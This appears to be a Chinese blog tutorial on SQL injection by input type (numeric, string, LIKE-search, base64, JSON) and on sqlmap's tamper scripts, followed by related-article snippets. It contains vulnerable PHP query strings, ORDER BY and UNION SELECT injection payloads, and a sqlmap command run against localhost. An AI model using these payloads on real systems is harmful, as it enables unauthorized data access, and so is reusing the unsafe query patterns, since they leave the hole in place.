sql 数据类型注入+tamper

已于 2023-12-18 15:58:50 修改
阅读量506 收藏 7
点赞数 10
文章标签: sql 数据库
于 2023-12-15 21:11:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2202_75317918/article/details/134975606
版权

数据类型

数字型 0-9

查询语句:

$sql="select * from sy_guestbook where id=$i";

字符型 a-z 中文 标点符号 加入了单引号

查询语句:

$sql="select * from sy_guestbook where gTpl='$g'";
simple' order by 16--+

select * from sy_guestbook where gTpl='simple' order by 16--+'


搜索型 在基础上又加入的通配符

查询语句:

$sql="select * from sy_guestbook where gName like '%s%

演示%' UNION+ALL+SELECT+1,datab,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 and %'=


select * from sy guestbook where gName like %演示%' UNION+ALL+SELECT+1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 and '%'='%'

编码型 数据以编码值传递

 查询语句:

$param = base64_decode($_GET['param']);

$sql = "SELECT * FROM users WHERE id = '$param'"

加密型 数据以加密的密文去发送
 

格式型 JSON
数据进行编码接受处理:发送编码值,对方常会进行解码后带入数据在进行SQL执行在注入的时候,我们也要尝试对注入的Payload进行编码后提交

分为键名和键值,类似py的字典。

这个需要注意的就是单引号的闭合,双引号是不作为值传入到源码里面进行处理的,从源码里面我们也可以知道只需要闭合单引号即可,至于{}这个符号,是josn自带的,这个不用考虑。

总结:

(开发程序里面,数字不需要单引号,字符需要单引号 双引号去概括的
需要考虑到符号的闭合 才能正确去执行SQL 完成SQL注入)

我在本地尝试了编码型base64

?param=MQ==

tamper

因为进行了base64编码,sqlmap直接跑是跑不出的

因为我们人知道这是base64,但是他不知道

那么!!!

这个时候就可以用到!!!

tamper!!!

Sqlmap的脚本都在tamper目录下

sqlmap.py -u "http://localhost/?param=MQ==" --tamper=base64encode.py

好的已经见识到tamper的魅力了

 

木…
关注
  • 10
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqlmap-tamper说明大全
10-03
本文档主要说明sqlmap的tamper使用情况以及主要使用方法,很全的说明文档。
可以用的firefox+tamper
06-06
firefox 3.6配合tamper无敌了。
sqlmap tamper mysql_SqlMap 1.2.7.20 Tamper详解及使用指南
weixin_42500789的博客
01-19 241
sqlmap是一款人见人爱的自动化SQL渗透工具,能够以良好的引擎发现给定URL中的可注入处,并自动化的完成注入。但是由于SQL注入的影响过于广泛,致使现代程序的防护越来越严密。sqlmap/tamper是官方给出的一些绕过脚本,可以配合渗透测试人员完成更高效更高质量的测试。本文共分为三个部分,第一部分简要对tamper进行介绍,以及为何要使用它,如何使用;第二部分给出当前最新版本(1.2.7-2...
SQLMap中tamper的简介
热门推荐
super_m@n的博客
04-06 1万+
目录结构 一、SQLMap中tamper的简介 1.tamper的作用 2.tamper用法 二、适配不同数据库类型的测试tamper 三、SQLMap中tamper篡改脚本的功能解释 一、SQLMap中tamper的简介 1.tamper的作用 使用SQLMap提供的tamper脚本,可在一定程度上避开应用程序的敏感字符过滤、绕过WAF规则的阻挡,继而进行渗透攻击。 部分...
SQLMAP插件tamper模块介绍
永远是少年
08-25 1476
今天继续给大家介绍渗透测试相关知识,本文主要内容是SQLMAP插件tamper模块介绍。在SQLMAP中,有很多tamper插件,常用的tamper插件及其作用如下所示: **1、apostrophemast.py** 该脚本可以将payload中所有的引号替换成utf-8的格式 **2、base64encode.py** 该脚本可以将payload替换成Base64编码的格式。 **3、multiplespaces.py** 该脚本可以将payload中关
sqlmap中各个 tamper 的作用
烟敛寒林的博客
10-26 4463
各个 tamper 的作用   apostrophemask.py: return payload.replace(''', "%EF%BC%87") if payload else payload 将单引号 url 编码,用于过滤了单引号的情况。 1' AND '1'='1 to 1%EF%BC%87 AND %EF%BC%871%EF%BC%87=%EF%BC%871 适用...
day27 SQL注入&Tamper脚本
wanjia01的博客
10-15 877
小迪安全笔记
sql注入教程.sql注入实战
11-09
sql注入详细教程 寻找存在sql注入的网址 探测过滤 tamper 得到shell
kiwi 浏览器 apk 安装包 + tampermonkey-4.14.crx插件
10-25
Kiwi浏览器是一款非常好用的安卓手机浏览器,其主要是基于谷歌Chromium内核和WebKit打造,并且最重要的是支持Chrome扩展程序的手机浏览器。Adblock等热门CRX扩展程序均能在手机上使用,让你的浏览器变得更加功能。
SQL注入之如何检测与判断详细过程
01-31
SQL注入系列大纲分为: 1、检测 2、Sqlmap的使用 3、编写sqlmap的tamper 4、Fuzz过waf 5、sqlmapApi的使用 以前注入点满大街,一个单引号就可以判断出是否存在注入点。但是如今随着各大厂商越来越注重安全,各种...
SQLMap之Tamper.docx
09-26
使用SQLMap提供的tamper脚本,可在一定程度上避开应用程序的敏感字符过滤、绕过WAF规则的阻挡,继而进行渗透攻击。 文档为对各脚本功能的详细解释。
sql注入tamper绕过WAF防火墙
weixin_33974433的博客
07-31 384
### 现象: 当我们注入的时候,发现有狗,有waf,真的是我的小心脏都碎掉了!!但是呢,很多时候还是得静下来分析过滤系统到底过滤了哪些参数,该如何绕过。利用sqlmap中的tamper给我们带来了很多防过滤的脚本绕过。 提示“输入内容存在危险字符,已经被拦截” 提示“请不要尝试在参数中包含非法字符尝试注入” ### 判断我们使用那种脚本 1,id...
sqlmap绕过过滤的tamper脚本分类汇总
我不是大牛
07-04 1030
sql去除表中某个字段的空格
最新发布
HelloWorld的专栏
05-20 52
比如表中名字字段,名字之间有空格,需要把空格去除,应该如何写SQL语句实现?函数来去除字符串两端的空格,如果需要去除字段中的所有空格,可以使用。以下是一个示例,假设我们有一个名为。的表,并且我们想要去除。在SQL中,可以使用。
Oracle数据库之PL/SQL基本语法(八)
pursue_mony的博客
05-14 114
PL/SQL 是 Oracle 数据库中使用的过程化 SQL 语言扩展,它允许你在 SQL 语句中嵌入控制结构、变量声明、异常处理等。用于在 PL/SQL 块中输出调试信息。为了看到这些信息,你需要在 SQL*Plus 或其他客户端中启用它(例如,使用。PL/SQL 代码通常被组织在块(block)中。一个块包含三个部分:声明部分、执行部分和异常处理部分。包是 PL/SQL 中一种将逻辑、变量、常量、游标、类型、子程序、异常等组合在一起的数据库对象。在 PL/SQL 中,你可以在。部分来处理运行时错误。
SQL——SERVER的建表的基础知识
m0_74012211的博客
05-15 1316
SQL——SERVER的基本建表操作
SQL的心得
weixin_64842400的博客
05-11 610
接着,系统按照 GROUP BY 子句中的指定字段分组,并对每个分组进行计算,生成虚拟的分组结果表。执行顺序 :from > on > where > group by > having > select > distinct > order by > top。4、聚合函数本质:对指定的列进行聚合,如果我们用了group by,我们可以对每个分组应用内聚合函数。在分组内部,聚合函数会自动处理所有重复的行。具体来说,在执行 SELECT 子句时,系统先计算 SELECT 中的列表达式和函数等,然后。
sql实践
m0_56366541的博客
05-14 247
3.在select中使用if/case语句(from、where中也可以)在excel导入数据时要先在数据库中创建对应的数据库表。之后点击开始等待一会就结束了。选择文件,选择需要导入的表。2.尝试简单查询/复杂查询。1.从excel导入数据。6.存储过程中的本地变量。
tampermonkey+压缩包
12-28
Tampermonkey是一款流行的浏览器扩展和用户脚本管理器,它可以帮助用户管理和运行用户脚本。用户脚本是一些自定义的脚本,可以修改网页的行为和外观,以满足用户的需求。 如果你想使用Tampermonkey,并且已经有了一...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值